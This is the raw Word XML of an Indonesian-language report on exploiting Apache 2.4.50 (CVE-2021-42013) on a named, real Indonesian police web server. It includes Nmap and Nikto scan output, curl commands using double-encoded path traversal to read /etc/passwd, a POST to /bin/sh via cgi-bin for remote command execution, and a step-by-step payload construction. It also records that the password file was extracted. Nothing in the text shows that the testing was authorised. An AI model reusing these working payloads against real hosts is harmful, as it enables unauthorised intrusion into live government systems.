    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4B99056E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CFFFFC7" w14:paraId="52D12FD1" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa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2BD16" wp14:textId="77777777">
            <w:r w:rsidRPr="3CFFFFC7" w:rsidR="3CFFFFC7">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:color w:val="1B3A6B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>CATATAN: Meskipun 'ServerTokens Prod' menyembunyikan nomor versi pada header Server, versi sebenarnya (2.4.50) masih dapat diidentifikasi melalui Shodan fingerprinting dan pola respons error page Apache yang unik per versi.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1299C43A" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0409B179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5.4 Nmap Port Scan &amp; Service Detection</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="60D93CCD" wp14:textId="769858C0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$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nmap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sV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sC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p 8080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script http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headers,http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title dumaspresisi.itwasum.polri.go.id</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="608DEACE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128F060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Starting Nmap 7.93 ( https://nmap.org )</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1E7B684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Nmap scan report for dumaspresisi.itwasum.polri.go.id ([REDACTED])</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="2E72F36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PORT     STATE  SERVICE  VERSION</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="30A8CC5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8080/tcp open   http     Apache httpd</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1ED14C96" wp14:textId="491C7B8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| http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title: DUMAS PRESISI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Direktorat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Tindak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Pidana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Tertentu</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="2526876C" wp14:textId="746ED22A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| http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server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header: Apache</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="6C9594F7" wp14:textId="78A5CB5A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| http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methods:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="515147E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|   Supported Methods: GET POST HEAD OPTIONS</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="62F35AB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|_  Potentially risky methods: OPTIONS</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2BAC6FC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6E3126D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Service detection performed.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="10A0F0B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Apache version 2.4.50 confirmed via error page fingerprinting</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4DDBEF00" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="3461D779" wp14:textId="51F5A134">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1B3A6B" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="480" w:after="14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>6. Vulnerability &amp; Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5050E76C" wp14:textId="5F7DCD4C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6.2 Manual Verification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 curl Test</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="337CA98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Test 1: Verifikasi akses ke /etc/passwd melalui path traversal</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="507E58E7" wp14:textId="4A3F787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$ curl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path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as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is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s \</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1F6228F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'http://dumaspresisi.itwasum.polri.go.id:8080/icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd'</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1014666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3638D8C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Response: HTTP 200 dengan isi /etc/passwd (KONFIRMASI RENTAN)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="5B68B9C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1F453EE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Test 2: Verifikasi versi Apache secara pasti</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="39E6A063" wp14:textId="1239C09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$ curl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s 'http://dumaspresisi.itwasum.polri.go.id:8080/nonexistent' | grep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apache</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="02DE4C9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Output: Apache/2.4.50 Server at ... Port 8080</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1B7172F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18844C8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Test 3: Verifikasi mod_cgi aktif</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1CB32A50" wp14:textId="5D06A16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$ curl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path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as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is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s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X POST \</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1ED9C15F" wp14:textId="0F6586A5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 'echo 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Type: text/plain; echo;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uname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a' \</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="6277B073" wp14:textId="11CEACA3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'http://dumaspresisi.itwasum.polri.go.id:8080/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cgi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bin/%%32%65%%32%65/bin/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sh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'</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3CF2D8B6" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="04B0B574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6.3 Nikto Web Vulnerability Scan</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="719D4947" wp14:textId="264C562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$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nikto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 http://dumaspresisi.itwasum.polri.go.id:8080</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="325CE30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34FA7EA1" wp14:textId="6E810C21">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1A2332"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="300" w:right="300"/>
      </w:pP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Nikto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v2.1.6</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="4FB7BD2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+ Target IP:          [REDACTED]</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4C90593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+ Target Hostname:    dumaspresisi.itwasum.polri.go.id</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="2FDA4D2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+ Target Port:        8080</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="25DD334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2C82B9F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+ Server: Apache</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="19A7321D" wp14:textId="1D8C242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+ OSVDB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877: HTTP TRACE method is active, suggesting the host is vulnerable to XST</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="19C6D2D3" wp14:textId="4DCB65BB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+ Apache/2.4.50 appears to be outdated (2021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10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07)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="54661367" wp14:textId="71247E6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+ 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42013: Apache 2.4.50 Path Traversal and RCE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CONFIRMED VULNERABLE</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3EFF9EB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+ /icons/: Directory indexing found</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="17D47D4C" wp14:textId="0987155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+ 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cgi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bin/: CGI directory accessible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RCE risk if scripts present</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="1FC52EC3" wp14:textId="0A08D178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+ OSVDB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3233: /icons/: Apache default icon path accessible</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="3DCE9685" wp14:textId="3545980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+ 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Frame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Options header is not present.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="3EAF43F3" wp14:textId="051AE68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+ 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Type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Options header not set.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="5A0D7554" wp14:textId="79CECF5A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+ No CGI Directories found (use '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C all' to force check all possible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dirs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)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0FB78278" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="31CB2B97" wp14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1B3A6B" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="480" w:after="14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7. Latar Belakang Kerentanan</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7ADE58C1" wp14:textId="254EAA5A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7.1 Apache HTTP Server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Arsitektur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Path Handling</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="712EEA37" wp14:textId="724B5E8A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Apache HTTP Server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menangani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setiap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URI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diterima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melalui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serangkaian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tahap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pemrosesan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sebelum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menyajikan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konten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Salah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satu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tahap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kritis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adalah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normalisasi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jalur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(path normalization),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bertujuan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membersihkan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karakter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karakter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berbahaya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seperti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..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/ (parent directory traversal), null bytes (%00),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representasi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encoding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berpotensi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menyebabkan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traversal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direktori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0A112CBE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Proses normalisasi melibatkan fungsi ap_normalize_path() di server/util.c, yang dipanggil setelah URL decoding awal dan sebelum akses ke filesystem. Kegagalan pada fungsi ini memungkinkan penyerang melewati batas direktori yang ditetapkan dalam konfigurasi Apache.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1FC39945" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="692EB121" wp14:textId="66AEC4D3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7.2 CVE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2021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41773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 Asal Mula (Apache 2.4.49)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="16C33699" wp14:textId="2715E4B0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CVE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2021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41773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pertama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kali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ditemukan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dipublikasikan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pada 4 Oktober 2021,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hanya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beberapa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hari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setelah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Apache 2.4.49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dirilis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pada 15 September 2021.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Kerentanan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disebabkan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oleh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perbaikan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kode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normalisasi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diperkenalkan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di 2.4.49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tidak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memadai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2A73B599" wp14:textId="2AD94DA8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Vektor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GET /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cgi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bin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/.%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2e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/.%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2e/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etc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/passwd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single URL encoding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titik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kedua</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7F2FAD67" wp14:textId="0BD4AB88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Kondisi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Require all granted pada &lt;Directory /&gt; ATAU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direktif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tidak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ada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sama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sekali</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="200BBEA3" wp14:textId="4727A1CA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Dampak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Information disclosure (path traversal) dan RCE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jika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mod_cgi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aktif</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="67FBEFEE" wp14:textId="1010D650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CVSS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7.5 (High)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untuk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path traversal, 9.8 (Critical)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dengan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RCE</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="0562CB0E" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3D9CCD6D" wp14:textId="1C3874C0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7.3 CVE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2021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42013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Bypass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Perbaikan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(Apache 2.4.50)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="778B9F54" wp14:textId="47C6C3B4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waktu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kurang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dari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2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minggu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setelah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CVE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2021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41773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dipublikasikan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Apache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merilis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versi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2.4.50 pada 7 Oktober 2021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dengan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klaim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memperbaiki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kerentanan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tersebut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Namun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perbaikan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diterapkan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ternyata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tidak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mencakup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semua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teknik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encoding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memungkinkan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2F167478" wp14:textId="65985455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Perbaikan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di 2.4.50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Filter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tambahan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untuk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.%2e dan %2e. (single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encoded dot)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="19142963" wp14:textId="5C190D3C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Bypass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ditemukan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Gunakan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%%32%65 (double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encoded dot)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tidak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terdeteksi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filter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baru</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="52B61862" wp14:textId="645C1137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CVSS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ditingkatkan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9.8 (Critical)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karena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kegagalan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patch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seharusnya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sudah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memperbaiki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masalah</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="636A06B7" wp14:textId="132831E5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Implikasi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Administrator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sudah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upgrade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2.4.50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merasa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aman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padahal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masih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rentan</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="34CE0A41" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4293B57C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7.4 Timeline Pengungkapan Lengkap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2860"/>
      </w:tblGrid>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="211A63FA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F49D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Tanggal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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0D2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1225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Dampak</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="5013F381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D33B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15 Sep 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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3152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Apache HTTP Server 2.4.49 dirilis dengan kode normalisasi baru yang bermasalah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E2B7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Kerentanan diperkenalkan ke production</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="61C73F35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52D5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01 Okt 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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8D84" wp14:textId="18F14BCF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CVE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2021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41773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pertama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kali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dilaporkan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ke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Apache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secara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private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8C8D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Koordinasi disclosure dimulai</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="69D6A239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0213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04 Okt 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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E2B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Apache mengeluarkan advisory dan merilis 2.4.50 sebagai perbaikan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85E1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Organisasi mulai upgrade ke 2.4.50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="56E79A75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4A30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05 Okt 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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D831" wp14:textId="12928F62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Peneliti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menemukan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CVE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2021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42013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bypass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perbaikan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2.4.50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989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2.4.50 terbukti masih rentan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="7DD02F81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8997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07 Okt 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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564E" wp14:textId="5E0B1ADB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PoC CVE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2021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42013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tersebar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luas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di internet dan Shodan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1B73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Eksploitasi massal dimulai</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="41573980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740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08 Okt 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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6E61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Apache merilis 2.4.51 dengan perbaikan komprehensif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1628" wp14:textId="108D941E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Satu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satunya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versi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aman</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="2E1210EC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D30B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Okt 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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A950" wp14:textId="65EE4451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CISA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menambahkan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CVE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2021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41773 &amp; 42013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ke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Known Exploited Vulnerabilities (KEV)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371D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Kewajiban patch Federal AS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="4AEF38C8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84A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Nov 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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E948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Puluhan ribu server masih rentan di Shodan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6A5B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Kelemahan patch management global</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="49AFB829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D50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07 Jan 2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4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9980" wp14:textId="3F6AD47A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Server POLRI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teridentifikasi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masih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rentan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2+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tahun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setelah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patch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tersedia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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44A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/etc/passwd diekstrak</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="62EBF3C5" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="4E0AEBDF" wp14:textId="1C81DF03">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1B3A6B" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="480" w:after="14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8. Traversal Analysis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Mekanisme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 Bypass</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="297952AC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8.1 Prinsip URL Encoding</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="51BD5450" wp14:textId="0CF809C1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URL encoding (percent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encoding)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adalah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mekanisme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standar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RFC 3986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merepresentasikan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karakter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khusus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URI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menggunakan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format %XX, di mana XX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adalah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nilai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heksadesimal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karakter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tersebut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charset ASCII/UTF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8.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800"/>
        <w:gridCol w:w="2000"/>
        <w:gridCol w:w="2460"/>
      </w:tblGrid>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="694723E0" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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0712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Karakter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C504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ASCII (Hex)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F4E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Single Encoded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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A27C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Double Encoded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7A0B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Makna</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="42071E2C" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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EA2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. (dot)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03A2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0x2e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CEEC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%2e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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266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%%32%65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3FC3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Karakter titik</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="65BB0922" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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49C8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/ (slash)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6F1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0x2f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38B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%2f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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26A5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%%32%66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AA8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Pemisah direktori</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidTr="3CFFFFC7" w14:paraId="7D49DA95" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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ABE9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../ (traversal)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1ED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0x2e 0x2e 0x2f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AC71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.%2e/ atau %2e./</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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542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%%32%65%%32%65/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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058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Naik satu direktori</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6D98A12B" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="08CF1FC1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8.2 Mekanisme Double URL Encoding</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="10C86CB1" wp14:textId="0A3E2CDC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Double encoding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bekerja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dengan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mengaplikasikan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URL encoding dua kali pada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karakter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sama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Pada Apache 2.4.50, filter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keamanan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hanya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melakukan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satu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kali decoding,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sehingga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representasi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double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encoded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berhasil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melewati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pemeriksaan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:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="79DC137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Konversi langkah per langkah: karakter titik (.):</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="23DD831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69D8617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ORIGINAL       :  .  (dot, ASCII 0x2E)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="28CE8CB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60CA704D" wp14:textId="57CFCEE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# Step 1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Single URL Encode:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="60F8B9D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.  →  %2e        (%=persen, 2e=hex untuk karakter titik)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1895D3B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068081EE" wp14:textId="22010FD8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Step 2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Double URL Encode (encode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komponen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dari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%2e):</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="70804A1F" wp14:textId="6271F752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%  →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%25  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persen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itu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sendiri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di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encode)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="056038E1" wp14:textId="101B017A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2  →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%32  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digit '2' di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encode: ASCII 0x32)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="2F30DF09" wp14:textId="5FC8864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  →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%65  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huruf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'e' di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encode: ASCII 0x65)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7FDE0BDC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6B71FB8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Hasilnya: %2e → %%32%65  (prefix % tetap, 2→%32, e→%65)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="3834AC1A" wp14:textId="22EC8BE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Catatan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: %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pertama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TIDAK di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encode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berbeda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dari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implementasi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lain)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6C1031F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778D4DA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Konstruksi payload ../ dalam double encoding:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3CFFFFC7" w14:paraId="0324540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../ → %%32%65%%32%65/</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="4CE745D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5754D93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Payload path traversal lengkap (7 level ke atas):</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="50B1921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/icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6334F29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 %%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/</w:t>
      </w:r>
    </w:p>
